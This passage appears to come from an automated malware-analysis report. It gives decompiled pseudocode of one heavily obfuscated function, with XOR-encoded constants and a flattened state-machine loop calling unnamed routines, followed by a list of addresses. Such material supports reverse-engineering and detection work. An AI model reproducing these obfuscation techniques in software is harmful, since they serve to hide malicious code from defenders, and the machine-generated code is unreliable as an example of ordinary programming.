                                                                                                                          				signed int _v2816;
                                                                                                                          				signed int _v2820;
                                                                                                                          				signed int _v2824;
                                                                                                                          				signed int _v2828;
                                                                                                                          				signed int _v2832;
                                                                                                                          				signed int _v2836;
                                                                                                                          				signed int _v2840;
                                                                                                                          				signed int _v2844;
                                                                                                                          				signed int _v2848;
                                                                                                                          				signed int _v2852;
                                                                                                                          				signed int _v2856;
                                                                                                                          				signed int _v2860;
                                                                                                                          				signed int _v2864;
                                                                                                                          				signed int _v2868;
                                                                                                                          				signed int _v2872;
                                                                                                                          				signed int _v2876;
                                                                                                                          				signed int _v2880;
                                                                                                                          				signed int _v2884;
                                                                                                                          				signed int _v2888;
                                                                                                                          				signed int _v2892;
                                                                                                                          				signed int _v2896;
                                                                                                                          				signed int _v2900;
                                                                                                                          				signed int _v2904;
                                                                                                                          				signed int _v2908;
                                                                                                                          				signed int _v2912;
                                                                                                                          				signed int _v2916;
                                                                                                                          				signed int _v2920;
                                                                                                                          				signed int _v2924;
                                                                                                                          				signed int _v2928;
                                                                                                                          				void* _t703;
                                                                                                                          				void* _t707;
                                                                                                                          				signed int _t708;
                                                                                                                          				signed int _t717;
                                                                                                                          				void* _t730;
                                                                                                                          				void* _t736;
                                                                                                                          				signed int _t738;
                                                                                                                          				signed int _t739;
                                                                                                                          				signed int _t740;
                                                                                                                          				signed int _t741;
                                                                                                                          				signed int _t742;
                                                                                                                          				signed int _t743;
                                                                                                                          				signed int _t744;
                                                                                                                          				signed int _t745;
                                                                                                                          				void* _t758;
                                                                                                                          				signed int _t798;
                                                                                                                          				void* _t803;
                                                                                                                          				void* _t804;
                                                                                                                          				void* _t811;
                                                                                                                          
                                                                                                                          				_v2608 = _v2608 & 0x00000000;
                                                                                                                          				_v2616 = 0xa2c333;
                                                                                                                          				_v2612 = 0xd97943;
                                                                                                                          				_v2696 = 0x74b91;
                                                                                                                          				_v2696 = _v2696 + 0xffffab65;
                                                                                                                          				_v2696 = _v2696 ^ 0x0006f6df;
                                                                                                                          				_v2804 = 0x130b03;
                                                                                                                          				_v2804 = _v2804 << 9;
                                                                                                                          				_v2804 = _v2804 + 0x8374;
                                                                                                                          				_v2804 = _v2804 ^ 0x26068974;
                                                                                                                          				_v2876 = 0x240a80;
                                                                                                                          				_v2876 = _v2876 >> 6;
                                                                                                                          				_v2876 = _v2876 >> 5;
                                                                                                                          				_v2876 = _v2876 ^ 0x3e269fec;
                                                                                                                          				_v2876 = _v2876 ^ 0x3e253447;
                                                                                                                          				_v2924 = 0x49db5b;
                                                                                                                          				_v2924 = _v2924 + 0xd552;
                                                                                                                          				_t803 = __ecx;
                                                                                                                          				_t798 = 0xce4571;
                                                                                                                          				_t738 = 0x27;
                                                                                                                          				_v2924 = _v2924 / _t738;
                                                                                                                          				_v2924 = _v2924 + 0x3019;
                                                                                                                          				_v2924 = _v2924 ^ 0x0006d24f;
                                                                                                                          				_v2796 = 0xf8ea63;
                                                                                                                          				_v2796 = _v2796 << 3;
                                                                                                                          				_v2796 = _v2796 + 0x8798;
                                                                                                                          				_v2796 = _v2796 ^ 0x07c9cae5;
                                                                                                                          				_v2864 = 0x679d3b;
                                                                                                                          				_t739 = 0x25;
                                                                                                                          				_v2864 = _v2864 * 0x7a;
                                                                                                                          				_v2864 = _v2864 / _t739;
                                                                                                                          				_v2864 = _v2864 << 0xc;
                                                                                                                          				_v2864 = _v2864 ^ 0x5a5eda92;
                                                                                                                          				_v2688 = 0xbc1f25;
                                                                                                                          				_v2688 = _v2688 << 0xd;
                                                                                                                          				_v2688 = _v2688 ^ 0x83e15555;
                                                                                                                          				_v2700 = 0xc3e9b4;
                                                                                                                          				_v2700 = _v2700 ^ 0x7e7d7a5b;
                                                                                                                          				_v2700 = _v2700 ^ 0x7ebc2479;
                                                                                                                          				_v2684 = 0x348655;
                                                                                                                          				_v2684 = _v2684 + 0xffff5240;
                                                                                                                          				_v2684 = _v2684 ^ 0x0038d539;
                                                                                                                          				_v2836 = 0xc8c90d;
                                                                                                                          				_v2836 = _v2836 | 0x6050777e;
                                                                                                                          				_v2836 = _v2836 + 0xfffffb37;
                                                                                                                          				_v2836 = _v2836 << 0xe;
                                                                                                                          				_v2836 = _v2836 ^ 0x3ea8df0c;
                                                                                                                          				_v2664 = 0x4ea234;
                                                                                                                          				_v2664 = _v2664 ^ 0x152f142f;
                                                                                                                          				_v2664 = _v2664 ^ 0x1568dd81;
                                                                                                                          				_v2900 = 0xa78742;
                                                                                                                          				_v2900 = _v2900 * 0x70;
                                                                                                                          				_v2900 = _v2900 + 0x89c7;
                                                                                                                          				_v2900 = _v2900 * 0x26;
                                                                                                                          				_v2900 = _v2900 ^ 0xe13351a3;
                                                                                                                          				_v2752 = 0x43c729;
                                                                                                                          				_v2752 = _v2752 * 9;
                                                                                                                          				_v2752 = _v2752 >> 0xc;
                                                                                                                          				_v2752 = _v2752 ^ 0x0004a0a7;
                                                                                                                          				_v2656 = 0x163ba0;
                                                                                                                          				_v2656 = _v2656 | 0x3b2cca0a;
                                                                                                                          				_v2656 = _v2656 ^ 0x3b3c61f3;
                                                                                                                          				_v2800 = 0x539f85;
                                                                                                                          				_v2800 = _v2800 + 0xffff9927;
                                                                                                                          				_v2800 = _v2800 >> 0xd;
                                                                                                                          				_v2800 = _v2800 ^ 0x000ca278;
                                                                                                                          				_v2892 = 0xaa9f70;
                                                                                                                          				_v2892 = _v2892 | 0xffd04745;
                                                                                                                          				_t740 = 0x33;
                                                                                                                          				_v2892 = _v2892 * 0x48;
                                                                                                                          				_v2892 = _v2892 + 0xabed;
                                                                                                                          				_v2892 = _v2892 ^ 0xfe85b4b6;
                                                                                                                          				_v2728 = 0x66b1f8;
                                                                                                                          				_v2728 = _v2728 + 0xffffb85a;
                                                                                                                          				_v2728 = _v2728 + 0xffff17c5;
                                                                                                                          				_v2728 = _v2728 ^ 0x00666892;
                                                                                                                          				_v2792 = 0x34b823;
                                                                                                                          				_v2792 = _v2792 + 0x705f;
                                                                                                                          				_v2792 = _v2792 | 0x13d147dd;
                                                                                                                          				_v2792 = _v2792 ^ 0x13fd2081;
                                                                                                                          				_v2884 = 0x7f5269;
                                                                                                                          				_v2884 = _v2884 >> 0x10;
                                                                                                                          				_v2884 = _v2884 + 0xdf59;
                                                                                                                          				_v2884 = _v2884 ^ 0x086ba2e3;
                                                                                                                          				_v2884 = _v2884 ^ 0x086346ed;
                                                                                                                          				_v2784 = 0x4150c;
                                                                                                                          				_v2784 = _v2784 ^ 0xadfae27c;
                                                                                                                          				_v2784 = _v2784 << 0xf;
                                                                                                                          				_v2784 = _v2784 ^ 0x7bb89155;
                                                                                                                          				_v2860 = 0x3ff4f9;
                                                                                                                          				_v2860 = _v2860 + 0x97ef;
                                                                                                                          				_v2860 = _v2860 ^ 0x8a52113e;
                                                                                                                          				_v2860 = _v2860 * 0x3b;
                                                                                                                          				_v2860 = _v2860 ^ 0xd244680a;
                                                                                                                          				_v2920 = 0xf20633;
                                                                                                                          				_v2920 = _v2920 >> 0xa;
                                                                                                                          				_v2920 = _v2920 << 6;
                                                                                                                          				_v2920 = _v2920 | 0x86ded8f3;
                                                                                                                          				_v2920 = _v2920 ^ 0x86d0715a;
                                                                                                                          				_v2676 = 0xbc4416;
                                                                                                                          				_v2676 = _v2676 + 0x253a;
                                                                                                                          				_v2676 = _v2676 ^ 0x00bded5f;
                                                                                                                          				_v2928 = 0x15fa7c;
                                                                                                                          				_v2928 = _v2928 >> 1;
                                                                                                                          				_v2928 = _v2928 * 0x6e;
                                                                                                                          				_v2928 = _v2928 >> 4;
                                                                                                                          				_v2928 = _v2928 ^ 0x00445a38;
                                                                                                                          				_v2844 = 0xaff44e;
                                                                                                                          				_v2844 = _v2844 * 0x28;
                                                                                                                          				_v2844 = _v2844 ^ 0x281c7ad4;
                                                                                                                          				_v2844 = _v2844 * 0xe;
                                                                                                                          				_v2844 = _v2844 ^ 0xcf625ac8;
                                                                                                                          				_v2744 = 0x5c05ba;
                                                                                                                          				_v2744 = _v2744 << 1;
                                                                                                                          				_v2744 = _v2744 ^ 0x54918a83;
                                                                                                                          				_v2744 = _v2744 ^ 0x542c1472;
                                                                                                                          				_v2904 = 0xa399f4;
                                                                                                                          				_v2904 = _v2904 / _t740;
                                                                                                                          				_t741 = 9;
                                                                                                                          				_v2904 = _v2904 / _t741;
                                                                                                                          				_v2904 = _v2904 >> 0xb;
                                                                                                                          				_v2904 = _v2904 ^ 0x000d27e7;
                                                                                                                          				_v2912 = 0xbe4d5b;
                                                                                                                          				_v2912 = _v2912 << 2;
                                                                                                                          				_v2912 = _v2912 >> 8;
                                                                                                                          				_v2912 = _v2912 + 0xbc5;
                                                                                                                          				_v2912 = _v2912 ^ 0x000f01bd;
                                                                                                                          				_v2888 = 0xb7f9c;
                                                                                                                          				_v2888 = _v2888 ^ 0x23a090a0;
                                                                                                                          				_v2888 = _v2888 + 0xffffcb65;
                                                                                                                          				_v2888 = _v2888 + 0xffffb53f;
                                                                                                                          				_v2888 = _v2888 ^ 0x23a896a2;
                                                                                                                          				_v2776 = 0xcbb323;
                                                                                                                          				_v2776 = _v2776 + 0x81c3;
                                                                                                                          				_v2776 = _v2776 >> 1;
                                                                                                                          				_v2776 = _v2776 ^ 0x00676393;
                                                                                                                          				_v2648 = 0x271f91;
                                                                                                                          				_v2648 = _v2648 + 0xffff9397;
                                                                                                                          				_v2648 = _v2648 ^ 0x0029f035;
                                                                                                                          				_v2896 = 0x78618c;
                                                                                                                          				_v2896 = _v2896 << 0xc;
                                                                                                                          				_v2896 = _v2896 ^ 0x0a821cde;
                                                                                                                          				_v2896 = _v2896 + 0xb475;
                                                                                                                          				_v2896 = _v2896 ^ 0x8c94da80;
                                                                                                                          				_v2720 = 0xacdc2a;
                                                                                                                          				_v2720 = _v2720 | 0x57611697;
                                                                                                                          				_v2720 = _v2720 ^ 0xc01b1ef4;
                                                                                                                          				_v2720 = _v2720 ^ 0x97fc8dfe;
                                                                                                                          				_v2668 = 0x55603e;
                                                                                                                          				_v2668 = _v2668 >> 1;
                                                                                                                          				_v2668 = _v2668 ^ 0x002dad1d;
                                                                                                                          				_v2828 = 0xf126f6;
                                                                                                                          				_t742 = 0x29;
                                                                                                                          				_v2828 = _v2828 * 0x43;
                                                                                                                          				_v2828 = _v2828 + 0x8cbb;
                                                                                                                          				_v2828 = _v2828 ^ 0x3f126f56;
                                                                                                                          				_v2768 = 0x9c087b;
                                                                                                                          				_v2768 = _v2768 << 9;
                                                                                                                          				_v2768 = _v2768 + 0xffffe171;
                                                                                                                          				_v2768 = _v2768 ^ 0x3813f585;
                                                                                                                          				_v2880 = 0xb815a3;
                                                                                                                          				_v2880 = _v2880 ^ 0x72879ea7;
                                                                                                                          				_v2880 = _v2880 / _t742;
                                                                                                                          				_v2880 = _v2880 + 0xc3b;
                                                                                                                          				_v2880 = _v2880 ^ 0x02c00b8a;
                                                                                                                          				_v2872 = 0xffe9a8;
                                                                                                                          				_v2872 = _v2872 | 0x05f4b9e7;
                                                                                                                          				_v2872 = _v2872 + 0xffff2424;
                                                                                                                          				_v2872 = _v2872 << 7;
                                                                                                                          				_v2872 = _v2872 ^ 0xff8a2c7e;
                                                                                                                          				_v2808 = 0x17a98a;
                                                                                                                          				_t743 = 0x6a;
                                                                                                                          				_v2808 = _v2808 * 0x35;
                                                                                                                          				_v2808 = _v2808 + 0x8a0b;
                                                                                                                          				_v2808 = _v2808 ^ 0x04e27d5d;
                                                                                                                          				_v2644 = 0x3aca8c;
                                                                                                                          				_v2644 = _v2644 | 0x1dba2023;
                                                                                                                          				_v2644 = _v2644 ^ 0x1dba33fd;
                                                                                                                          				_v2760 = 0xa9a4ba;
                                                                                                                          				_v2760 = _v2760 ^ 0x6721c4f3;
                                                                                                                          				_v2760 = _v2760 + 0xffff7b43;
                                                                                                                          				_v2760 = _v2760 ^ 0x6786e634;
                                                                                                                          				_v2660 = 0xef5940;
                                                                                                                          				_t327 =  &_v2660; // 0xef5940
                                                                                                                          				_v2660 =  *_t327 / _t743;
                                                                                                                          				_v2660 = _v2660 ^ 0x0008b7a5;
                                                                                                                          				_v2640 = 0x8c91f9;
                                                                                                                          				_v2640 = _v2640 + 0x2aa0;
                                                                                                                          				_v2640 = _v2640 ^ 0x008fd6f1;
                                                                                                                          				_v2716 = 0xebae10;
                                                                                                                          				_v2716 = _v2716 + 0x2e93;
                                                                                                                          				_v2716 = _v2716 >> 3;
                                                                                                                          				_v2716 = _v2716 ^ 0x0012b27f;
                                                                                                                          				_v2692 = 0xf4ef17;
                                                                                                                          				_v2692 = _v2692 ^ 0x14a8ca79;
                                                                                                                          				_v2692 = _v2692 ^ 0x145940a6;
                                                                                                                          				_v2712 = 0x90da21;
                                                                                                                          				_v2712 = _v2712 * 0x5c;
                                                                                                                          				_v2712 = _v2712 << 6;
                                                                                                                          				_v2712 = _v2712 ^ 0x039c340b;
                                                                                                                          				_v2812 = 0x599c06;
                                                                                                                          				_v2812 = _v2812 | 0x7b64813d;
                                                                                                                          				_v2812 = _v2812 * 0x3e;
                                                                                                                          				_v2812 = _v2812 ^ 0xe8633365;
                                                                                                                          				_v2748 = 0x57b46;
                                                                                                                          				_t744 = 0x38;
                                                                                                                          				_v2748 = _v2748 / _t744;
                                                                                                                          				_v2748 = _v2748 + 0xffffe4a2;
                                                                                                                          				_v2748 = _v2748 ^ 0xffff7983;
                                                                                                                          				_v2856 = 0xb347e1;
                                                                                                                          				_v2856 = _v2856 << 0xf;
                                                                                                                          				_v2856 = _v2856 + 0xc3e6;
                                                                                                                          				_v2856 = _v2856 ^ 0xcd6ff0ef;
                                                                                                                          				_v2856 = _v2856 ^ 0x6e991901;
                                                                                                                          				_v2756 = 0x3d21e7;
                                                                                                                          				_v2756 = _v2756 + 0x4052;
                                                                                                                          				_v2756 = _v2756 + 0xfab6;
                                                                                                                          				_v2756 = _v2756 ^ 0x0033d413;
                                                                                                                          				_v2680 = 0xeea097;
                                                                                                                          				_v2680 = _v2680 * 0x29;
                                                                                                                          				_v2680 = _v2680 ^ 0x26367c85;
                                                                                                                          				_v2852 = 0x9a84c7;
                                                                                                                          				_v2852 = _v2852 << 4;
                                                                                                                          				_v2852 = _v2852 + 0x5305;
                                                                                                                          				_v2852 = _v2852 * 0x47;
                                                                                                                          				_v2852 = _v2852 ^ 0xadc8f5b7;
                                                                                                                          				_v2736 = 0x1d92c0;
                                                                                                                          				_v2736 = _v2736 ^ 0x4e3febcd;
                                                                                                                          				_v2736 = _v2736 ^ 0x2a5eeaad;
                                                                                                                          				_v2736 = _v2736 ^ 0x647637b5;
                                                                                                                          				_v2916 = 0x7a6f6e;
                                                                                                                          				_v2916 = _v2916 << 3;
                                                                                                                          				_v2916 = _v2916 | 0x74549758;
                                                                                                                          				_v2916 = _v2916 * 0x5e;
                                                                                                                          				_v2916 = _v2916 ^ 0x014df6ca;
                                                                                                                          				_v2820 = 0x88f64;
                                                                                                                          				_v2820 = _v2820 << 0xb;
                                                                                                                          				_v2820 = _v2820 ^ 0x8d7f89a1;
                                                                                                                          				_v2820 = _v2820 ^ 0xc90720e1;
                                                                                                                          				_v2672 = 0x9d7b6a;
                                                                                                                          				_v2672 = _v2672 * 0x74;
                                                                                                                          				_v2672 = _v2672 ^ 0x47521deb;
                                                                                                                          				_v2868 = 0x2a980b;
                                                                                                                          				_v2868 = _v2868 << 2;
                                                                                                                          				_v2868 = _v2868 * 0x37;
                                                                                                                          				_v2868 = _v2868 * 0x45;
                                                                                                                          				_v2868 = _v2868 ^ 0xdda58f8d;
                                                                                                                          				_v2704 = 0xd94882;
                                                                                                                          				_v2704 = _v2704 >> 7;
                                                                                                                          				_v2704 = _v2704 ^ 0x000dd1c5;
                                                                                                                          				_v2908 = 0x8685cf;
                                                                                                                          				_v2908 = _v2908 >> 6;
                                                                                                                          				_v2908 = _v2908 + 0x478f;
                                                                                                                          				_v2908 = _v2908 | 0x9a4acbdf;
                                                                                                                          				_v2908 = _v2908 ^ 0x9a416c75;
                                                                                                                          				_v2724 = 0x3983d7;
                                                                                                                          				_v2724 = _v2724 ^ 0xaf8ece10;
                                                                                                                          				_v2724 = _v2724 + 0xfffffe8c;
                                                                                                                          				_v2724 = _v2724 ^ 0xafb9f002;
                                                                                                                          				_v2652 = 0xb48fd9;
                                                                                                                          				_v2652 = _v2652 >> 7;
                                                                                                                          				_v2652 = _v2652 ^ 0x0003170e;
                                                                                                                          				_v2732 = 0x26e706;
                                                                                                                          				_v2732 = _v2732 + 0xffff7cb3;
                                                                                                                          				_v2732 = _v2732 << 7;
                                                                                                                          				_v2732 = _v2732 ^ 0x13307998;
                                                                                                                          				_v2840 = 0xdaf489;
                                                                                                                          				_v2840 = _v2840 ^ 0x20b9ad9c;
                                                                                                                          				_v2840 = _v2840 + 0xa5fa;
                                                                                                                          				_v2840 = _v2840 ^ 0x206e4944;
                                                                                                                          				_v2848 = 0x15799;
                                                                                                                          				_v2848 = _v2848 + 0xffffbd76;
                                                                                                                          				_v2848 = _v2848 | 0x84cc3dff;
                                                                                                                          				_v2848 = _v2848 ^ 0x84c4ee28;
                                                                                                                          				_v2740 = 0x344f78;
                                                                                                                          				_v2740 = _v2740 | 0xed30b44e;
                                                                                                                          				_v2740 = _v2740 + 0x582d;
                                                                                                                          				_v2740 = _v2740 ^ 0xed3a4892;
                                                                                                                          				_v2764 = 0x3aec11;
                                                                                                                          				_t745 = 0x14;
                                                                                                                          				_v2764 = _v2764 * 0x24;
                                                                                                                          				_v2764 = _v2764 * 0xd;
                                                                                                                          				_v2764 = _v2764 ^ 0x6bb19aaa;
                                                                                                                          				_v2772 = 0xa2a4e3;
                                                                                                                          				_v2772 = _v2772 * 0x54;
                                                                                                                          				_v2772 = _v2772 + 0xd74c;
                                                                                                                          				_v2772 = _v2772 ^ 0x35517ae7;
                                                                                                                          				_v2780 = 0xc7cad3;
                                                                                                                          				_v2780 = _v2780 ^ 0xe16f0727;
                                                                                                                          				_v2780 = _v2780 + 0xa55f;
                                                                                                                          				_v2780 = _v2780 ^ 0xe1ad612a;
                                                                                                                          				_v2788 = 0x30bac2;
                                                                                                                          				_v2788 = _v2788 << 2;
                                                                                                                          				_v2788 = _v2788 * 0x19;
                                                                                                                          				_v2788 = _v2788 ^ 0x130f6af8;
                                                                                                                          				_v2708 = 0x5b81b7;
                                                                                                                          				_v2708 = _v2708 << 0xd;
                                                                                                                          				_v2708 = _v2708 ^ 0x7032fecb;
                                                                                                                          				_v2816 = 0xe0b39a;
                                                                                                                          				_v2816 = _v2816 + 0xf3c;
                                                                                                                          				_v2816 = _v2816 * 0x29;
                                                                                                                          				_v2816 = _v2816 ^ 0x23fa5b32;
                                                                                                                          				_v2832 = 0xb37143;
                                                                                                                          				_v2832 = _v2832 + 0xffff99de;
                                                                                                                          				_v2832 = _v2832 / _t745;
                                                                                                                          				_v2832 = _v2832 | 0xcb90c15e;
                                                                                                                          				_v2832 = _v2832 ^ 0xcb9cb56b;
                                                                                                                          				_v2824 = 0xf7e429;
                                                                                                                          				_v2824 = _v2824 << 0x10;
                                                                                                                          				_v2824 = _v2824 ^ 0x4b169193;
                                                                                                                          				_v2824 = _v2824 ^ 0xaf30b470;
                                                                                                                          				_t703 = E007A7CDB(_t745);
                                                                                                                          				_t797 = _v2708;
                                                                                                                          				_t736 = _t703;
                                                                                                                          				while(1) {
                                                                                                                          					L1:
                                                                                                                          					do {
                                                                                                                          						while(1) {
                                                                                                                          							L2:
                                                                                                                          							_t811 = _t798 - 0xa06a9d5;
                                                                                                                          							if(_t811 <= 0) {
                                                                                                                          								break;
                                                                                                                          							}
                                                                                                                          							__eflags = _t798 - 0xae01df1;
                                                                                                                          							if(__eflags == 0) {
                                                                                                                          								_push(_v2740);
                                                                                                                          								_push(0);
                                                                                                                          								_push(_t745);
                                                                                                                          								_push(1);
                                                                                                                          								_push(0);
                                                                                                                          								_push(_v2848);
                                                                                                                          								_t745 = _v2732;
                                                                                                                          								_push( &_v524);
                                                                                                                          								E0079AB87(_t745, _v2840, __eflags);
                                                                                                                          								_t804 = _t804 + 0x1c;
                                                                                                                          								_t798 = 0xfe27958;
                                                                                                                          								_t707 = 0x8a3cf08;
                                                                                                                          								goto L24;
                                                                                                                          							} else {
                                                                                                                          								__eflags = _t798 - 0xb104717;
                                                                                                                          								if(_t798 == 0xb104717) {
                                                                                                                          									_t745 = _v2748;
                                                                                                                          									_t708 = E00794816(_t745, _v2632, _v2856, _v2636, _v2756, _v2680);
                                                                                                                          									_t797 = _t708;
                                                                                                                          									_t804 = _t804 + 0x10;
                                                                                                                          									__eflags = _t708;
                                                                                                                          									_t707 = 0x8a3cf08;
                                                                                                                          									_t798 =  !=  ? 0x8a3cf08 : 0xa06a9d5;
                                                                                                                          									continue;
                                                                                                                          								} else {
                                                                                                                          									__eflags = _t798 - 0xe3ea8aa;
                                                                                                                          									if(_t798 == 0xe3ea8aa) {
                                                                                                                          										return E007A1E67(_v2708, _v2816, _v2832, _v2824, _v2628);
                                                                                                                          									}
                                                                                                                          									__eflags = _t798 - 0xfe27958;
                                                                                                                          									if(_t798 != 0xfe27958) {
                                                                                                                          										goto L24;
                                                                                                                          									} else {
                                                                                                                          										E007A8519(_v2764, _v2772, _t797);
                                                                                                                          										_pop(_t745);
                                                                                                                          										_t798 = 0xa06a9d5;
                                                                                                                          										while(1) {
                                                                                                                          											L1:
                                                                                                                          											goto L2;
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							L27:
                                                                                                                          							return _t717;
                                                                                                                          						}
                                                                                                                          						if(_t811 == 0) {
                                                                                                                          							E007A8519(_v2780, _v2788, _v2636);
                                                                                                                          							_pop(_t745);
                                                                                                                          							_t798 = 0xe3ea8aa;
                                                                                                                          							while(1) {
                                                                                                                          								L1:
                                                                                                                          								goto L2;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						if(_t798 == 0xce4571) {
                                                                                                                          							_push(_v2700);
                                                                                                                          							_push(_v2696);
                                                                                                                          							_push(_v2688);
                                                                                                                          							_t745 = _v2796;
                                                                                                                          							_push( &_v1044);
                                                                                                                          							E007A46BB(_t745, _v2864);
                                                                                                                          							_t804 = _t804 - 0xc + 0x1c;
                                                                                                                          							_t798 = 0x2f0d176;
                                                                                                                          							while(1) {
                                                                                                                          								L1:
                                                                                                                          								goto L2;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						if(_t798 == 0x277711d) {
                                                                                                                          							_v2624 = E007959E9();
                                                                                                                          							_v2620 = 2 + E0079CB52(_v2668, _t714, _v2828, _v2768, _v2880) * 2;
                                                                                                                          							_t745 =  &_v2628;
                                                                                                                          							_t717 = E007A8727(_t745, _v2804, _v2668, _v2872, _v2808, _v2668, _v2644, _t736, _t736, _v2760, _t736, _v2660, _v2640);
                                                                                                                          							_t804 = _t804 + 0x38;
                                                                                                                          							__eflags = _t717;
                                                                                                                          							if(__eflags != 0) {
                                                                                                                          								_t798 = 0x47e8611;
                                                                                                                          								goto L1;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							if(_t798 == 0x2f0d176) {
                                                                                                                          								E007ADA22(_v2684, _v2836, __eflags, _v2664,  &_v2084, _t745, _v2900);
                                                                                                                          								 *((short*)(E0079B6CF( &_v2084, _v2752, _v2656, _v2800))) = 0;
                                                                                                                          								E00798969(_v2892,  &_v1564, __eflags, _v2728, _v2792);
                                                                                                                          								_push(_v2860);
                                                                                                                          								_push(_v2784);
                                                                                                                          								E007947CE( &_v2084, _v2920, _v2884, _v2676, _v2928, E007ADCF7(_v2884, 0x791308, __eflags),  &_v1564, _v2844, _v2744);
                                                                                                                          								E0079A8B0(_v2904, _t722, _v2912);
                                                                                                                          								_t745 = _v2888;
                                                                                                                          								_t717 = E0079EA99(_t745, _t803, _v2776, _v2648,  &_v2604, _v2896);
                                                                                                                          								_t804 = _t804 + 0x5c;
                                                                                                                          								__eflags = _t717;
                                                                                                                          								if(__eflags != 0) {
                                                                                                                          									_t798 = 0x277711d;
                                                                                                                          									while(1) {
                                                                                                                          										L1:
                                                                                                                          										goto L2;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								if(_t798 == 0x47e8611) {
                                                                                                                          									_t745 =  &_v2636;
                                                                                                                          									E007ADEDC(_t745, _v2716, _v2692, _v2712,  &_v2628, _v2812);
                                                                                                                          									_t804 = _t804 + 0x10;
                                                                                                                          									asm("sbb esi, esi");
                                                                                                                          									_t798 = (_t798 & 0xfcd19e6d) + 0xe3ea8aa;
                                                                                                                          									while(1) {
                                                                                                                          										L1:
                                                                                                                          										goto L2;
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									_t816 = _t798 - _t707;
                                                                                                                          									if(_t798 != _t707) {
                                                                                                                          										goto L24;
                                                                                                                          									} else {
                                                                                                                          										_push(_v2916);
                                                                                                                          										_push(_v2736);
                                                                                                                          										_t730 = E007ADCF7(_v2852, 0x7913f8, _t816);
                                                                                                                          										_pop(_t758);
                                                                                                                          										E007A453F(_v2820, _t816, _v2672, _t730, _v2868,  &_v1044, _t758, _v2704, _v2908, _t797,  &_v2604);
                                                                                                                          										_t804 = _t804 + 0x24;
                                                                                                                          										E0079A8B0(_v2724, _t730, _v2652);
                                                                                                                          										_pop(_t745);
                                                                                                                          										_t798 = 0xae01df1;
                                                                                                                          										while(1) {
                                                                                                                          											L1:
                                                                                                                          											goto L2;
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						goto L27;
                                                                                                                          						L24:
                                                                                                                          						__eflags = _t798 - 0xe39a6fa;
                                                                                                                          					} while (__eflags != 0);
                                                                                                                          					return _t707;
                                                                                                                          				}
                                                                                                                          			}

                                                                                                                          0x007a52ff
                                                                                                                          0x007a530a
                                                                                                                          0x007a5315
                                                                                                                          0x007a531d
                                                                                                                          0x007a5322
                                                                                                                          0x007a532a
                                                                                                                          0x007a5332
                                                                                                                          0x007a533a
                                                                                                                          0x007a5345
                                                                                                                          0x007a5350
                                                                                                                          0x007a535b
                                                                                                                          0x007a5366
                                                                                                                          0x007a5379
                                                                                                                          0x007a5380
                                                                                                                          0x007a538b
                                                                                                                          0x007a5393
                                                                                                                          0x007a5398
                                                                                                                          0x007a53a5
                                                                                                                          0x007a53a9
                                                                                                                          0x007a53b1
                                                                                                                          0x007a53bc
                                                                                                                          0x007a53c7
                                                                                                                          0x007a53d2
                                                                                                                          0x007a53dd
                                                                                                                          0x007a53e5
                                                                                                                          0x007a53ea
                                                                                                                          0x007a53f7
                                                                                                                          0x007a53fb
                                                                                                                          0x007a5403
                                                                                                                          0x007a540e
                                                                                                                          0x007a5416
                                                                                                                          0x007a5421
                                                                                                                          0x007a542c
                                                                                                                          0x007a543f
                                                                                                                          0x007a5446
                                                                                                                          0x007a5451
                                                                                                                          0x007a5459
                                                                                                                          0x007a5463
                                                                                                                          0x007a546c
                                                                                                                          0x007a5470
                                                                                                                          0x007a5478
                                                                                                                          0x007a5483
                                                                                                                          0x007a548b
                                                                                                                          0x007a5496
                                                                                                                          0x007a549e
                                                                                                                          0x007a54a3
                                                                                                                          0x007a54ab
                                                                                                                          0x007a54b3
                                                                                                                          0x007a54bb
                                                                                                                          0x007a54c6
                                                                                                                          0x007a54d1
                                                                                                                          0x007a54dc
                                                                                                                          0x007a54e7
                                                                                                                          0x007a54f2
                                                                                                                          0x007a54fa
                                                                                                                          0x007a5505
                                                                                                                          0x007a5510
                                                                                                                          0x007a551b
                                                                                                                          0x007a5523
                                                                                                                          0x007a552e
                                                                                                                          0x007a553e
                                                                                                                          0x007a5546
                                                                                                                          0x007a554e
                                                                                                                          0x007a5556
                                                                                                                          0x007a5568
                                                                                                                          0x007a5570
                                                                                                                          0x007a5578
                                                                                                                          0x007a5580
                                                                                                                          0x007a558b
                                                                                                                          0x007a5596
                                                                                                                          0x007a55a1
                                                                                                                          0x007a55ac
                                                                                                                          0x007a55c1
                                                                                                                          0x007a55c2
                                                                                                                          0x007a55d1
                                                                                                                          0x007a55d8
                                                                                                                          0x007a55e3
                                                                                                                          0x007a55f6
                                                                                                                          0x007a55fd
                                                                                                                          0x007a5608
                                                                                                                          0x007a5613
                                                                                                                          0x007a561e
                                                                                                                          0x007a5629
                                                                                                                          0x007a5634
                                                                                                                          0x007a563f
                                                                                                                          0x007a564a
                                                                                                                          0x007a565a
                                                                                                                          0x007a5661
                                                                                                                          0x007a566c
                                                                                                                          0x007a5677
                                                                                                                          0x007a567f
                                                                                                                          0x007a568a
                                                                                                                          0x007a5695
                                                                                                                          0x007a56a8
                                                                                                                          0x007a56af
                                                                                                                          0x007a56ba
                                                                                                                          0x007a56c2
                                                                                                                          0x007a56d0
                                                                                                                          0x007a56d4
                                                                                                                          0x007a56dc
                                                                                                                          0x007a56e4
                                                                                                                          0x007a56ec
                                                                                                                          0x007a56f1
                                                                                                                          0x007a56f9
                                                                                                                          0x007a5709
                                                                                                                          0x007a570e
                                                                                                                          0x007a5715
                                                                                                                          0x007a5717
                                                                                                                          0x007a5717
                                                                                                                          0x007a571c
                                                                                                                          0x007a571c
                                                                                                                          0x007a571c
                                                                                                                          0x007a571c
                                                                                                                          0x007a5722
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a5a30
                                                                                                                          0x007a5a36
                                                                                                                          0x007a5ac0
                                                                                                                          0x007a5ace
                                                                                                                          0x007a5ad0
                                                                                                                          0x007a5ad1
                                                                                                                          0x007a5ad3
                                                                                                                          0x007a5ad5
                                                                                                                          0x007a5ae0
                                                                                                                          0x007a5ae7
                                                                                                                          0x007a5ae8
                                                                                                                          0x007a5aed
